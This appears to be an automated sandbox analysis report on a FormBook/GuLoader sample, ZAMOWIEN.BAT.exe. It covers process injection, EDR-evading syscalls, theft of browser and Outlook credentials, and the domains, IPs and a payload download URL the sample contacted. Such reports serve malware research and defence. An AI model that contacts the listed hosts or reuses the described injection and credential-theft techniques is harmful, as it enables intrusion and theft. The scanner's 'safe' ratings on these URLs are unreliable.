          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov eax, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov eax, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FBE80 mov eax, dword ptr fs:[00000030h]2_2_376FBE80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BD71 mov eax, dword ptr fs:[00000030h]2_2_3770BD71
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BD71 mov eax, dword ptr fs:[00000030h]2_2_3770BD71
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E5D60 mov eax, dword ptr fs:[00000030h]2_2_376E5D60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37755D60 mov eax, dword ptr fs:[00000030h]2_2_37755D60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A5D65 mov eax, dword ptr fs:[00000030h]2_2_377A5D65
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDD4D mov eax, dword ptr fs:[00000030h]2_2_376EDD4D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDD4D mov eax, dword ptr fs:[00000030h]2_2_376EDD4D

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x694DE3Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x694672Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6953BFJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x69C58DJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x69FF180Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A06DCEJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x69C6E4Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeNtClose: Indirect: 0x373DF61B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x69320BJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x69C4F1Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FF8F2DE2651Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeNtQueueApcThread: Indirect: 0x373DF590Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6954ADJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF8BDDD9E7F
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6954F1Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x69C63CJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x69FF1F7Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x69547EJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x693A78Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeNtSuspendThread: Indirect: 0x373E3B69Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x69DB74Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeNtResumeThread: Indirect: 0x373E3E89Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x69C782
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x69FEFB1Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeNtSetContextThread: Indirect: 0x373E3849Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeThread register set: target process: 7484Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 7484Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 5620Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Masquerading
          1
          OS Credential Dumping
          121
          Security Software Discovery
          Remote Services1
          Email Collection
          1
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
          Process Injection
          2
          Virtualization/Sandbox Evasion
          LSASS Memory2
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Abuse Elevation Control Mechanism
          1
          Access Token Manipulation
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          311
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object Model1
          Clipboard Data
          4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets3
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism
          Cached Domain Credentials14
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Obfuscated Files or Information
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562240 Sample: ZAMOWIEN.BAT.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 96 31 www.tals.xyz 2->31 33 ymx01.cn 2->33 35 25 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Yara detected FormBook 2->47 49 Yara detected GuLoader 2->49 10 ZAMOWIEN.BAT.exe 36 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 29 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->29 dropped 63 Switches to a custom stack to bypass stack traces 10->63 14 ZAMOWIEN.BAT.exe 6 10->14         started        signatures6 process7 dnsIp8 43 enechado.ru.com 103.83.194.50, 49741, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 14->43 65 Modifies the context of a thread in another process (thread injection) 14->65 67 Maps a DLL or memory area into another process 14->67 69 Queues an APC in another process (thread injection) 14->69 71 Found direct / indirect Syscall (likely to bypass EDR) 14->71 18 RAVCpl64.exe 14->18 injected signatures9 process10 dnsIp11 37 officinadelpasso.shop 195.110.124.133, 49742, 49791, 80 REGISTER-ASIT Italy 18->37 39 kanadeviainova.net 81.88.58.216, 49775, 49776, 49777 REGISTER-ASIT Italy 18->39 41 10 other IPs or domains 18->41 53 Found direct / indirect Syscall (likely to bypass EDR) 18->53 22 sdchange.exe 13 18->22         started        signatures12 process13 signatures14 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 2 other signatures 22->61 25 firefox.exe 22->25         started        process15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ZAMOWIEN.BAT.exe5%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll3%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.officinadelpasso.shop/vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78=0%Avira URL Cloudsafe
          http://www.nuy25c9t.sbs/gzx8/0%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://www.nartex-uf.online/sr6d/0%Avira URL Cloudsafe
          http://www.kanadeviainova.net/2muc/0%Avira URL Cloudsafe
          http://www.vayui.top/4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.tals.xyz/tj5o/0%Avira URL Cloudsafe
          http://www.cg19g5.pro/sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.108.foundation/h7t0/0%Avira URL Cloudsafe
          http://www.kanadeviainova.net/2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.prhmcjdz.tokyo/r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.golivenow.live/rb2m/0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
          http://www.aquax.cloud/ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.nartex-uf.online/sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.108.foundation/h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.mydreamdeal.click/zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.nuy25c9t.sbs/gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          http://www.prhmcjdz.tokyo/r45a/0%Avira URL Cloudsafe
          http://www.cg19g5.pro/sp9i/0%Avira URL Cloudsafe
          http://enechado.ru.com/0%Avira URL Cloudsafe
          http://enechado.ru.com/cF0%Avira URL Cloudsafe
          http://enechado.ru.com/pol.bin0%Avira URL Cloudsafe
          http://www.614genetics.online/ftvk/0%Avira URL Cloudsafe
          http://www.vayui.top/4twy/0%Avira URL Cloudsafe
          http://www.golivenow.live/rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayM0%Avira URL Cloudsafe
          http://www.tals.xyz/tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc=0%Avira URL Cloudsafe
          http://www.aquax.cloud/ij3v/0%Avira URL Cloudsafe
          http://www.mydreamdeal.click/zet9/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mydreamdeal.click
          104.21.27.59
          truetrue
            unknown
            ymx01.cn
            8.210.46.21
            truetrue
              unknown
              www.vayui.top
              172.67.145.234
              truetrue
                unknown
                www.golivenow.live
                66.29.149.46
                truetrue
                  unknown
                  www.aquax.cloud
                  45.81.23.25
                  truetrue
                    unknown
                    b1-3-r111.kunlundns.top
                    43.155.76.124
                    truetrue
                      unknown
                      www.cg19g5.pro
                      154.88.22.105
                      truetrue
                        unknown
                        www.108.foundation
                        13.248.169.48
                        truetrue
                          unknown
                          kanadeviainova.net
                          81.88.58.216
                          truetrue
                            unknown
                            www.nartex-uf.online
                            31.31.196.177
                            truetrue
                              unknown
                              enechado.ru.com
                              103.83.194.50
                              truefalse
                                unknown
                                officinadelpasso.shop
                                195.110.124.133
                                truetrue
                                  unknown
                                  www.tals.xyz
                                  13.248.169.48
                                  truetrue
                                    unknown
                                    www.614genetics.online
                                    208.91.197.27
                                    truetrue
                                      unknown
                                      www.officinadelpasso.shop
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.newtoppornx1.buzz
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.nuy25c9t.sbs
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.75178.club
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.prhmcjdz.tokyo
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.kanadeviainova.net
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.bagazone.online
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.tals.xyz/tj5o/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kanadeviainova.net/2muc/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.officinadelpasso.shop/vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.vayui.top/4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nartex-uf.online/sr6d/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kanadeviainova.net/2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.cg19g5.pro/sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nuy25c9t.sbs/gzx8/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.108.foundation/h7t0/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.golivenow.live/rb2m/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.prhmcjdz.tokyo/r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aquax.cloud/ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nartex-uf.online/sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mydreamdeal.click/zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.108.foundation/h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.prhmcjdz.tokyo/r45a/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nuy25c9t.sbs/gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.cg19g5.pro/sp9i/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.vayui.top/4twy/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.614genetics.online/ftvk/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://enechado.ru.com/pol.binfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tals.xyz/tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.golivenow.live/rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayMtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mydreamdeal.click/zet9/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aquax.cloud/ij3v/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://nsis.sf.net/NSIS_ErrorErrorZAMOWIEN.BAT.exe, 00000000.00000000.32164172113.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000000.33317382851.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000626000.00000020.00000001.01000000.00000008.sdmpfalse
                                                      high
                                                      http://www.gopher.ftp://ftp.ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                        high
                                                        http://enechado.ru.com/cFZAMOWIEN.BAT.exe, 00000002.00000002.33592322896.0000000007667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                          high
